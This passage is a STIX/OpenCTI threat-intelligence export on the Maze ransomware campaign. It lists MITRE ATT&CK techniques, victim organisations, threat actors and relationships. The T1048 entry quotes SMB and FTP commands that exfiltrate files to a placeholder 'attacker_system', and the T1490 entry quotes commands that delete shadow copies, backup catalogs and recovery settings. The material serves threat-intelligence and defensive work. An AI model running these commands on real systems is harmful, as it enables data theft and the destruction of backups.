"x_opencti_created": "2019-04-15T17:22:41.000Z",
"x_opencti_modified": "2019-04-15T17:22:41.000Z"
},
{
"id": "external-reference--62a8d4eb-144f-468c-81a9-23f4cf6e8924",
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/555.html",
"external_id": "CAPEC-555",
"x_opencti_id": "689a1341-1258-329b-89d1-811f3ebd4cfb",
"x_opencti_created": "2019-04-15T17:22:42.000Z",
"x_opencti_modified": "2019-04-15T17:22:42.000Z"
},
{
"id": "external-reference--a2e441da-91e1-4e4a-a67c-e92d94df3c08",
"source_name": "Alperovitch Malware",
"description": "Alperovitch, D. (2014, October 31). Malware-Free Intrusions. Retrieved November 4, 2014.",
"url": "http://blog.crowdstrike.com/adversary-tricks-crowdstrike-treats/",
"x_opencti_id": "7deab4d9-07cb-39e1-a083-346a96ab7528",
"x_opencti_created": "2019-04-15T17:22:42.000Z",
"x_opencti_modified": "2019-04-15T17:22:42.000Z"
},
{
"id": "external-reference--ebe04a9a-3772-48fb-b268-33c41272b1bf",
"source_name": "TechNet Remote Desktop Services",
"description": "Microsoft. (n.d.). Remote Desktop Services. Retrieved June 1, 2016.",
"url": "https://technet.microsoft.com/en-us/windowsserver/ee236407.aspx",
"x_opencti_id": "3a7ba0a9-e538-3bde-9f71-e1b29ce104d9",
"x_opencti_created": "2019-04-15T17:22:43.000Z",
"x_opencti_modified": "2019-04-15T17:22:43.000Z"
},
{
"id": "external-reference--a28b94f4-ef9f-4bd7-8c24-d2bc071e429e",
"source_name": "Kali Redsnarf",
"description": "NCC Group PLC. (2016, November 1). Kali Redsnarf. Retrieved December 11, 2017.",
"url": "https://github.com/nccgroup/redsnarf",
"x_opencti_id": "a55f22fc-a116-3313-9578-344b226250f2",
"x_opencti_created": "2019-04-15T17:22:45.000Z",
"x_opencti_modified": "2019-04-15T17:22:45.000Z"
},
{
"id": "external-reference--e6f57b7e-0abe-42bb-bc0c-45187bd58e74",
"source_name": "RDP Hijacking Medium",
"description": "Beaumont, K. (2017, March 19). RDP hijacking\u200a\u2014\u200ahow to hijack RDS and RemoteApp sessions transparently to move through an organisation. Retrieved December 11, 2017.",
"url": "https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6",
"x_opencti_id": "04609b65-87d4-33f2-a28c-56fe2bbc928a",
"x_opencti_created": "2019-04-15T17:22:44.000Z",
"x_opencti_modified": "2019-04-15T17:22:44.000Z"
},
{
"id": "external-reference--250cf804-54ce-43db-a6b4-d7f4105ebbe3",
"source_name": "RDP Hijacking Korznikov",
"description": "Korznikov, A. (2017, March 17). Passwordless RDP Session Hijacking Feature All Windows versions. Retrieved December 11, 2017.",
"url": "http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html",
"x_opencti_id": "1ec5a4bf-87cb-3f83-9dc6-1e4da46a36de",
"x_opencti_created": "2019-04-15T17:22:44.000Z",
"x_opencti_modified": "2019-04-15T17:22:44.000Z"
}
]
},
{
"id": "attack-pattern--a19e86f8-1c0a-4fea-8407-23b73d615776",
"type": "attack-pattern",
"x_opencti_external_id": "T1048",
"name": "Exfiltration Over Alternative Protocol",
"labels": [
"attack-pattern"
],
"description": "Data exfiltration is performed with a different protocol from the main command and control protocol or channel. The data is likely to be sent to an alternate network location from the main command and control server. Alternate protocols include FTP, SMTP, HTTP/S, DNS, SMB, or any other network protocol not being used as the main command and control channel. Different channels could include Internet Web services such as cloud storage.\n\nAdversaries may leverage various operating system utilities to exfiltrate data over an alternative protocol. \n\nSMB command-line example:\n\n* `net use \\\\\\attacker_system\\IPC$ /user:username password && xcopy /S /H /C /Y C:\\Users\\\\* \\\\\\attacker_system\\share_folder\\`\n\nAnonymous FTP command-line example:(Citation: Palo Alto OilRig Oct 2016)\n\n* `echo PUT C:\\Path\\to\\file.txt | ftp -A attacker_system`\n",
"created": "2017-05-31T21:30:44.000Z",
"modified": "2020-02-01T18:42:16.999Z",
"x_opencti_id": "34e9d31a-60d5-32da-89ab-bb7b876789ab",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"kill_chain_phases": [
{
"id": "kill-chain-phase--5be39400-f246-4d70-b62e-9af8ecf62ee3",
"kill_chain_name": "mitre-attack",
"phase_name": "exfiltration",
"x_opencti_id": "1019d87a-7952-3847-b24e-a3b866f89afb",
"x_opencti_phase_order": 0,
"x_opencti_created": "2019-04-15T16:54:14.000Z",
"x_opencti_modified": "2019-04-15T16:54:14.000Z"
}
],
"external_references": [
{
"id": "external-reference--e17ed2ca-8eae-4f69-a6ec-b2bf87d3053d",
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1048",
"external_id": "T1048",
"x_opencti_id": "897bc71e-43f5-3775-a475-a92066ad7951",
"x_opencti_created": "2019-04-15T17:01:22.000Z",
"x_opencti_modified": "2019-04-15T17:01:22.000Z"
},
{
"id": "external-reference--0c90aff7-f2af-4cb9-81f5-5f0d29ba98ce",
"source_name": "University of Birmingham C2",
"description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.",
"url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf",
"x_opencti_id": "a986b1d3-c365-3ccb-a677-4913160f8f8c",
"x_opencti_created": "2019-04-15T16:56:34.000Z",
"x_opencti_modified": "2019-04-15T16:56:34.000Z"
},
{
"id": "external-reference--0d527192-36cc-4b71-9141-7f60f5c1ae41",
"source_name": "Palo Alto OilRig Oct 2016",
"description": "Grunzweig, J. and Falcone, R.. (2016, October 4). OilRig Malware Campaign Updates Toolset and Expands Targets. Retrieved May 3, 2017.",
"url": "http://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/",
"x_opencti_id": "5b6cd692-37a9-43af-8acc-eede29bde200",
"x_opencti_created": "2019-12-09T18:43:46.000Z",
"x_opencti_modified": "2019-12-09T18:43:46.000Z"
}
]
},
{
"id": "attack-patern--c8bd35e8-f4ad-4001-8440-51b91d37d947",
"type": "attack-pattern",
"x_opencti_external_id": "T1490",
"name": "Inhibit System Recovery",
"labels": [
"attack-pattern"
],
"description": "Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) Operating systems may contain features that can help fix corrupted systems, such as a backup catalog, volume shadow copies, and automatic repair features. Adversaries may disable or delete system recovery features to augment the effects of [Data Destruction](https://attack.mitre.org/techniques/T1485) and [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486).(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017)\n\nA number of native Windows utilities have been used by adversaries to disable or delete system recovery features:\n\n* `vssadmin.exe` can be used to delete all volume shadow copies on a system - `vssadmin.exe delete shadows /all /quiet`\n* [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) can be used to delete volume shadow copies - `wmic shadowcopy delete`\n* `wbadmin.exe` can be used to delete the Windows Backup Catalog - `wbadmin.exe delete catalog -quiet`\n* `bcdedit.exe` can be used to disable automatic Windows recovery features by modifying boot configuration data - `bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no`",
"created": "2019-09-18T13:35:16.000Z",
"modified": "2020-02-01T20:32:11.341Z",
"x_opencti_id": "780ba549-6fd2-4a15-8db0-edb0507ff872",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"kill_chain_phases": [
{
"id": "kill-chain-phase--5a036e0e-9cb2-4add-b669-d61285790656",
"kill_chain_name": "mitre-attack",
"phase_name": "impact",
"x_opencti_id": "52deaaf0-805a-4105-bed3-9133c89dd1e1",
"x_opencti_phase_order": 0,
"x_opencti_created": "2019-09-18T13:36:37.000Z",
"x_opencti_modified": "2019-09-18T13:36:37.000Z"
}
],
"external_references": [
{
"id": "external-reference--48d9419c-22a1-4ee8-a95d-fe35ec1908f2",
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1490",
"external_id": "T1490",
"x_opencti_id": "8448731f-919f-407d-91ae-d434b6586f13",
"x_opencti_created": "2019-10-24T00:14:39.000Z",
"x_opencti_modified": "2019-10-24T00:14:39.000Z"
},
{
"id": "external-reference--a4d45728-062c-43c3-8390-c1f9d42f4fc8",
"source_name": "Talos Olympic Destroyer 2018",
"description": "Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer Takes Aim At Winter Olympics. Retrieved March 14, 2019.",
"url": "https://blog.talosintelligence.com/2018/02/olympic-destroyer.html",
"x_opencti_id": "91442889-36b4-436b-86ea-a67542cb018f",
"x_opencti_created": "2019-10-23T15:38:46.000Z",
"x_opencti_modified": "2019-10-23T15:38:46.000Z"
},
{
"id": "external-reference--8a9f44d5-9c54-4d6a-8f06-c776d20decc0",
"source_name": "FireEye WannaCry 2017",
"description": "Berry, A., Homan, J., and Eitzman, R. (2017, May 23). WannaCry Malware Profile. Retrieved March 15, 2019.",
"url": "https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html",
"x_opencti_id": "55d930ed-428b-461c-bfc6-c965a20503a9",
"x_opencti_created": "2019-10-24T00:14:40.000Z",
"x_opencti_modified": "2019-10-24T00:14:40.000Z"
}
]
},
{
"id": "attack-patern--d3828e37-fb36-4bbd-83be-1eacacaaec9e",
"type": "attack-pattern",
"x_opencti_external_id": "T1486",
"name": "Data Encrypted for Impact",
"labels": [
"attack-pattern"
],
"description": "Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.(Citation: US-CERT Ransomware 2016)(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017)(Citation: US-CERT SamSam 2018) In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted. In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.(Citation: US-CERT NotPetya 2017)\n\nTo maximize impact on the target organization, malware designed for encrypting data may have worm-like features to propagate across a network by leveraging other attack techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [Credential Dumping](https://attack.mitre.org/techniques/T1003), and [Windows Admin Shares](https://attack.mitre.org/techniques/T1077).(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017)",
"created": "2019-09-18T13:45:36.000Z",
"modified": "2020-02-01T21:32:07.439Z",
"x_opencti_id": "e7c0fb6c-dc23-4a1e-ba65-73b39b8ed370",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"kill_chain_phases": [
{
"id": "kill-chain-phase--5a036e0e-9cb2-4add-b669-d61285790656",
"kill_chain_name": "mitre-attack",
"phase_name": "impact",
"x_opencti_id": "52deaaf0-805a-4105-bed3-9133c89dd1e1",
"x_opencti_phase_order": 0,
"x_opencti_created": "2019-09-18T13:36:37.000Z",
"x_opencti_modified": "2019-09-18T13:36:37.000Z"
}
],
"external_references": [
{
"id": "external-reference--f5655366-c71e-4493-bfde-91146fabb267",
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1486",
"external_id": "T1486",
"x_opencti_id": "5db393d7-4a82-4c5b-885f-dc0b379e0abf",
"x_opencti_created": "2019-10-24T03:53:40.000Z",
"x_opencti_modified": "2019-10-24T03:53:40.000Z"
},
{
"id": "external-reference--4b46fe41-befa-4745-b5cf-d0061135fd66",
"source_name": "US-CERT SamSam 2018",
"description": "US-CERT. (2018, December 3). Alert (AA18-337A): SamSam Ransomware. Retrieved March 15, 2019.",
"url": "https://www.us-cert.gov/ncas/alerts/AA18-337A",
"x_opencti_id": "3d2eb604-acff-4ecd-ba65-10bb98789e3d",
"x_opencti_created": "2019-10-24T03:53:43.000Z",
"x_opencti_modified": "2019-10-24T03:53:43.000Z"
},
{
"id": "external-reference--ae8af219-ebb7-4c77-8002-2b778c1d8a57",
"source_name": "US-CERT Ransomware 2016",
"description": "US-CERT. (2016, March 31). Alert (TA16-091A): Ransomware and Recent Variants. Retrieved March 15, 2019.",
"url": "https://www.us-cert.gov/ncas/alerts/TA16-091A",
"x_opencti_id": "1e3f964d-cd33-42cb-9ecf-370e4d240203",
"x_opencti_created": "2019-10-24T03:53:41.000Z",
"x_opencti_modified": "2019-10-24T03:53:41.000Z"
},
{
"id": "external-reference--8a9f44d5-9c54-4d6a-8f06-c776d20decc0",
"source_name": "FireEye WannaCry 2017",
"description": "Berry, A., Homan, J., and Eitzman, R. (2017, May 23). WannaCry Malware Profile. Retrieved March 15, 2019.",
"url": "https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html",
"x_opencti_id": "55d930ed-428b-461c-bfc6-c965a20503a9",
"x_opencti_created": "2019-10-24T00:14:40.000Z",
"x_opencti_modified": "2019-10-24T00:14:40.000Z"
},
{
"id": "external-reference--1cdc3a31-9ff6-483c-94fb-c553c9bbe0ed",
"source_name": "US-CERT NotPetya 2017",
"description": "US-CERT. (2017, July 1). Alert (TA17-181A): Petya Ransomware. Retrieved March 15, 2019.",
"url": "https://www.us-cert.gov/ncas/alerts/TA17-181A",
"x_opencti_id": "4b947fa5-30d0-4dae-86e6-ea30cd215525",
"x_opencti_created": "2019-10-24T03:53:42.000Z",
"x_opencti_modified": "2019-10-24T03:53:42.000Z"
}
]
},
{
"id": "identity--9dc270f2-416f-40aa-865a-cbf6e87a04a9",
"type": "identity",
"name": "Insurance services (NIS)",
"identity_class": "class",
"labels": [
"identity"
],
"description": "Insurance brokers etc.",
"created": "2019-01-31T14:01:30.000Z",
"modified": "2019-01-31T14:01:30.000Z",
"x_opencti_identity_type": "sector",
"x_opencti_id": "5774b873-60d8-3628-9a4b-9415e52101d4"
},
{
"id": "organization--d4ac69a3-05ae-4184-8b2b-be93aaa84258",
"type": "identity",
"name": "Andrew Agencies",
"identity_class": "organization",
"labels": [
"identity"
],
"description": "Canadian insurance company.",
"created": "2020-02-04T15:06:17.875Z",
"modified": "2020-02-04T15:06:17.875Z",
"x_opencti_organization_class": null,
"x_opencti_identity_type": "organization",
"x_opencti_id": "7d00e1a3-a731-43d8-a39b-972381467380",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "organization--5a510e41-5cb2-45cc-a191-a4844ea0a141",
"type": "identity",
"name": "Southwire",
"identity_class": "organization",
"labels": [
"identity"
],
"description": "Leading wire and cables US-based manufacturer.",
"created": "2020-01-08T16:05:17.311Z",
"modified": "2020-01-08T16:05:17.311Z",
"x_opencti_organization_class": null,
"x_opencti_identity_type": "organization",
"x_opencti_id": "e2753312-1090-492d-a8fd-56ca36675d35",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "organization--c017f212-546b-4f21-999d-97d3dc558f7b",
"type": "identity",
"name": "Allied Universal",
"identity_class": "organization",
"labels": [
"identity"
],
"description": "US-based security company.",
"created": "2020-02-04T15:10:55.068Z",
"modified": "2020-02-04T15:10:55.068Z",
"x_opencti_organization_class": null,
"x_opencti_identity_type": "organization",
"x_opencti_id": "9ca2ff43-b765-4f13-a213-10664a2ae8fc",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "identity--515216e3-ecd4-43b3-8d74-69df72b65a83",
"type": "identity",
"name": "Bouygues Construction",
"identity_class": "organization",
"labels": [
"identity"
],
"description": "French construction company",
"created": "2019-07-29T12:48:06.000Z",
"modified": "2019-12-09T13:26:15.000Z",
"x_opencti_organization_class": null,
"x_opencti_identity_type": "organization",
"x_opencti_id": "5d42255b-32a0-48bb-9996-6700edb49574"
},
{
"id": "organization--0e5ef1d2-d80b-489c-a10b-58cf7ab8eee0",
"type": "identity",
"name": "City of Pensacola",
"identity_class": "organization",
"labels": [
"identity"
],
"description": "US municipality.",
"created": "2020-01-08T16:10:09.971Z",
"modified": "2020-01-08T16:10:09.971Z",
"x_opencti_organization_class": null,
"x_opencti_identity_type": "organization",
"x_opencti_id": "be1d7745-bd73-4763-93cc-34928036caa3",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "identity--433d071c-42e4-41fa-915e-bad5a7473bd1",
"type": "identity",
"name": "Food and drinks",
"identity_class": "class",
"labels": [
"identity"
],
"description": "Businesses preparing and serving food and drinks to customers in exchange for money.",
"created": "2019-11-04T17:50:08.000Z",
"modified": "2019-11-04T17:50:08.000Z",
"x_opencti_identity_type": "sector",
"x_opencti_id": "b62c846b-669d-4222-89c2-79722fa65587"
},
{
"id": "organization--c5969189-dcf6-4106-af6e-3a63118f20d9",
"type": "identity",
"name": "Fratelli Beretta",
"identity_class": "organization",
"labels": [
"identity"
],
"description": "Italian Food company.",
"created": "2020-02-04T15:24:49.316Z",
"modified": "2020-02-04T15:24:49.316Z",
"x_opencti_organization_class": null,
"x_opencti_identity_type": "organization",
"x_opencti_id": "dab03369-f673-4fc1-ad48-159ae5ebfa6e",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "organization--26cdeaa6-f435-4857-b631-27c247cd041d",
"type": "identity",
"name": "Stockdale radiology",
"identity_class": "organization",
"labels": [
"identity"
],
"description": "Healthcare company in US",
"created": "2020-02-04T15:30:45.143Z",
"modified": "2020-02-04T15:30:45.143Z",
"x_opencti_organization_class": null,
"x_opencti_identity_type": "organization",
"x_opencti_id": "a8dd629e-9bbb-43fc-a409-dc6d6e96e221"
},
{
"id": "organization--5b705ce2-ff85-4cc7-8264-63fdccf6fc92",
"type": "identity",
"name": "Lakeland Community College",
"identity_class": "organization",
"labels": [
"identity"
],
"description": "US-Based school.",
"created": "2020-02-04T15:37:34.747Z",
"modified": "2020-02-04T15:37:34.747Z",
"x_opencti_organization_class": null,
"x_opencti_identity_type": "organization",
"x_opencti_id": "cab0b94e-b957-4f6d-a648-3d9323307f04",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "identity--65463837-a41a-4b61-a074-b2f20f097555",
"type": "identity",
"name": "Schools",
"identity_class": "class",
"labels": [
"identity"
],
"description": "Public and private institutions for all primary and secondary school levels.",
"created": "2019-11-04T17:56:05.000Z",
"modified": "2019-11-04T17:56:05.000Z",
"x_opencti_identity_type": "sector",
"x_opencti_id": "46444953-5f31-41b6-9839-da630822c59b"
},
{
"id": "organization--f000c60f-263c-4864-8c8b-50a4390f0453",
"type": "identity",
"name": "Medical Diagnostic Laboratories",
"identity_class": "organization",
"labels": [
"identity"
],
"description": "US-based Healthcare company.",
"created": "2020-02-04T15:42:41.951Z",
"modified": "2020-02-04T15:42:41.951Z",
"x_opencti_organization_class": null,
"x_opencti_identity_type": "organization",
"x_opencti_id": "ba7a5f83-99d3-4c5a-a742-41f3674fe346",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "organization--a0eef190-9335-40a7-bab2-bcf6179a28fe",
"type": "identity",
"name": "Hamilton and Naumes",
"identity_class": "organization",
"labels": [
"identity"
],
"description": "US-based law firm.",
"created": "2020-02-04T15:46:52.908Z",
"modified": "2020-02-04T15:46:52.908Z",
"x_opencti_organization_class": null,
"x_opencti_identity_type": "organization",
"x_opencti_id": "433161e8-7405-4ac0-812e-e398c930cc2e",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "identity--fb102c71-bf02-42a0-82aa-bed03df3afb0",
"type": "identity",
"name": "Construction",
"identity_class": "class",
"labels": [
"identity"
],
"description": "Private entities engaged in preparation of land and construction, alteration and repair of building, structures and other real estate properties. ",
"created": "2019-03-07T08:38:38.000Z",
"modified": "2019-03-07T08:38:38.000Z",
"x_opencti_identity_type": "sector",
"x_opencti_id": "8e78d78b-906c-35fd-bea8-dee3b69df22b"
},
{
"id": "organization--f6700d44-b1db-4065-ba64-ed02034a7cd6",
"type": "identity",
"name": "Bird Construction",
"identity_class": "organization",
"labels": [
"identity"
],
"description": "General contractor Bird Construction, which is based in Toronto, was allegedly targeted by cyber-threat group MAZE in December 2019. MAZE claims to have stolen 60 GB of data from the company",
"created": "2020-02-04T15:50:28.195Z",
"modified": "2020-02-04T15:50:28.195Z",
"x_opencti_organization_class": null,
"x_opencti_identity_type": "organization",
"x_opencti_id": "08670c23-5bdc-45b5-889c-9a87f976df6a",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "identity--f0e37b7a-93e9-4884-ac16-84cbcc1f0a2f",
"type": "identity",
"name": "Consulting",
"identity_class": "class",
"labels": [
"identity"
],
"description": "Private entities providing expert advice in a specific field to external entities.",
"created": "2019-01-31T07:46:12.000Z",
"modified": "2019-01-31T07:46:12.000Z",
"x_opencti_identity_type": "sector",
"x_opencti_id": "2ac90d70-72ee-30a9-8a8d-5f5b44e1bb00"
},
{
"id": "identity--700b77c4-6eb1-40b0-98c8-14d454638a9f",
"type": "identity",
"name": "Legal consulting",
"identity_class": "class",
"labels": [
"identity"
],
"description": "No description",
"created": "2019-11-04T17:58:54.000Z",
"modified": "2019-11-04T17:58:54.000Z",
"x_opencti_identity_type": "sector",
"x_opencti_id": "d818aba6-0646-4678-9b52-1aebfb5281da"
},
{
"id": "identity--23c518a8-e30c-4813-bcef-4001cd834929",
"type": "identity",
"name": "Canada",
"identity_class": "organization",
"labels": [
"identity"
],
"description": "Canada",
"created": "2019-05-06T13:11:56.000Z",
"modified": "2019-05-06T13:11:56.000Z",
"x_opencti_identity_type": "country",
"x_opencti_id": "d0523f94-b69c-3114-8655-98c37bdf5a67"
},
{
"id": "identity--d2d2f930-4f0e-409b-9565-899ba3aba6af",
"type": "identity",
"name": "Italy",
"identity_class": "organization",
"labels": [
"identity"
],
"description": "Italy",
"created": "2019-05-07T11:47:45.000Z",
"modified": "2019-05-07T11:47:45.000Z",
"x_opencti_identity_type": "country",
"x_opencti_id": "96e500e7-abfa-3847-8874-57c493cb27c9"
},
{
"id": "identity--040b3a47-41a6-44d0-91f9-08614ba67364",
"type": "identity",
"name": "Healthcare services",
"identity_class": "class",
"labels": [
"identity"
],
"description": "Hospitals and other direct medical practice activities.",
"created": "2019-01-31T15:09:17.000Z",
"modified": "2019-01-31T15:09:17.000Z",
"x_opencti_identity_type": "sector",
"x_opencti_id": "6beae44c-2be7-315c-83f2-c0b4b0b4e4d6"
},
{
"id": "identity--f4c6843f-ed38-46e0-9e95-35c781f935b1",
"type": "identity",
"name": "Local administrations",
"identity_class": "class",
"labels": [
"identity"
],
"description": "Public administrations and government bodies managing a local territory under the global authority of a central government.",
"created": "2019-11-04T18:01:13.000Z",
"modified": "2019-11-04T18:01:13.000Z",
"x_opencti_identity_type": "sector",
"x_opencti_id": "daf1af32-6ac5-42f8-a92c-fe6238d758d4"
},
{
"id": "identity--5723cafe-2ef6-401c-a50b-0f0b754edb49",
"type": "identity",
"name": "Manufacturing",
"identity_class": "class",
"labels": [
"identity"
],
"description": "Private entities transforming and selling goods, products and equipment which are not included in other activity sectors.",
"created": "2019-10-09T15:47:13.000Z",
"modified": "2019-12-09T13:26:06.000Z",
"x_opencti_identity_type": "sector",
"x_opencti_id": "e8c239ed-a248-4916-9e8f-0be1f4678639"
},
{
"id": "identity--0700254d-cc41-4655-8e9e-f2b7ef9e38f6",
"type": "identity",
"name": "United States of America",
"identity_class": "organization",
"labels": [
"identity"
],
"description": "United States of America",
"created": "2019-04-17T09:03:11.000Z",
"modified": "2019-04-17T09:03:11.000Z",
"x_opencti_identity_type": "country",
"x_opencti_id": "c8c32fa5-576a-328d-b8b3-fb6d8a8d5355",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "identity--bb0a97dc-ae81-4c5e-9b56-3add2a980977",
"type": "identity",
"name": "France",
"identity_class": "organization",
"labels": [
"identity"
],
"description": "France",
"created": "2019-04-17T09:38:41.000Z",
"modified": "2019-04-17T09:38:41.000Z",
"x_opencti_identity_type": "country",
"x_opencti_id": "e3660e35-a97d-381d-8ce9-692f3ad44f3e",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "threat-actor--695dcd8f-53c8-45f6-b55a-3ae093d87f69",
"type": "threat-actor",
"name": "gladkoff1991",
"labels": [
"threat-actor"
],
"description": "email address [email protected] has been used to register C2 domains and is th only indicator associated with the operator of the campaign.\n",
"created": "2019-11-07T14:23:17.000Z",
"modified": "2019-11-07T14:23:17.000Z",
"x_opencti_id": "05989a20-6925-4657-94a7-bea5d945aa25"
},
{
"id": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"type": "threat-actor",
"name": "TA2101",
"labels": [
"threat-actor"
],
"description": "Cybercriminal Threat Actor oberved by Proofpoint and using Maze ransomware during phishing campaings impersonating german or italian authorities in october and november 2019. These campaigns targeted germany, Italy and US entities.",
"created": "2020-01-07T14:20:48.079Z",
"modified": "2020-01-07T14:21:50.319Z",
"x_opencti_id": "a615bbcf-bb97-4d3e-8d5b-748cd7519acd",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--19723a17-c942-4231-96f7-73db1c0d373b",
"type": "relationship",
"relationship_type": "uses",
"description": "The campaign was accompanied by a malicious Microsoft Word attachment with a purported RSA\nSecurID key, similarly-formatted to the one used in the previous campaigns.",
"source_ref": "campaign--4b02ceb0-e15c-40ea-b91b-4bbe0704c198",
"target_ref": "attack-pattern--6aac77c4-eaf2-4366-8c13-ce50ab951f38",
"x_opencti_source_ref": "campaign--4b02ceb0-e15c-40ea-b91b-4bbe0704c198",
"x_opencti_target_ref": "attack-pattern--6aac77c4-eaf2-4366-8c13-ce50ab951f38",
"created": "2020-01-07T14:50:11.226Z",
"modified": "2020-01-07T14:50:11.226Z",
"x_opencti_first_seen": "2019-11-11T23:00:00.000Z",
"x_opencti_last_seen": "2019-11-11T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "7f88e39a-bc1a-41fa-b78f-20b90f423f2a",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
],
"kill_chain_phases": [
{
"id": "kill-chain-phase--20aa9cbb-eb48-4569-9860-f0de6dab6b12",
"kill_chain_name": "mitre-attack",
"phase_name": "initial-access",
"x_opencti_id": "471c7de8-e846-3fc9-a57e-4a7b770b8f1d",
"x_opencti_phase_order": 0,
"x_opencti_created": "2019-04-15T17:00:39.000Z",
"x_opencti_modified": "2019-04-15T17:00:39.000Z"
}
]
},
{
"id": "relationship--940e927a-c350-495c-a612-96e91487c228",
"type": "relationship",
"relationship_type": "uses",
"source_ref": "campaign--4b02ceb0-e15c-40ea-b91b-4bbe0704c198",
"target_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"x_opencti_source_ref": "campaign--4b02ceb0-e15c-40ea-b91b-4bbe0704c198",
"x_opencti_target_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"created": "2020-02-04T14:45:19.013Z",
"modified": "2020-02-04T14:45:19.013Z",
"x_opencti_first_seen": "2019-11-05T23:00:00.000Z",
"x_opencti_last_seen": "2019-11-06T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "ace44529-755b-4ab6-9a7e-886211b34f4a",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
],
"kill_chain_phases": [
{
"id": "kill-chain-phase--5a036e0e-9cb2-4add-b669-d61285790656",
"kill_chain_name": "mitre-attack",
"phase_name": "impact",
"x_opencti_id": "52deaaf0-805a-4105-bed3-9133c89dd1e1",
"x_opencti_phase_order": 0,
"x_opencti_created": "2019-09-18T13:36:37.000Z",
"x_opencti_modified": "2019-09-18T13:36:37.000Z"
}
]
},
{
"id": "relationship--c9f8f9a4-024d-4c09-befd-d136554c1e04",
"type": "relationship",
"relationship_type": "related-to",
"source_ref": "campaign--4b02ceb0-e15c-40ea-b91b-4bbe0704c198",
"target_ref": "incident--82f427aa-7622-438f-9172-980fe432359c",
"x_opencti_source_ref": "campaign--4b02ceb0-e15c-40ea-b91b-4bbe0704c198",
"x_opencti_target_ref": "incident--82f427aa-7622-438f-9172-980fe432359c",
"created": "2020-02-04T15:12:34.675Z",
"modified": "2020-02-04T15:12:34.675Z",
"x_opencti_first_seen": "2019-10-20T22:00:00.000Z",
"x_opencti_last_seen": "2019-10-20T22:00:00.000Z",
"x_opencti_weight": 2,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "776cb63b-5e77-411e-86ad-740e1725b6bf",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--aaa6aa7d-b035-4d85-bedc-be3091883fff",
"type": "relationship",
"relationship_type": "localization",
"source_ref": "identity--515216e3-ecd4-43b3-8d74-69df72b65a83",
"target_ref": "identity--bb0a97dc-ae81-4c5e-9b56-3add2a980977",
"x_opencti_source_ref": "identity--515216e3-ecd4-43b3-8d74-69df72b65a83",
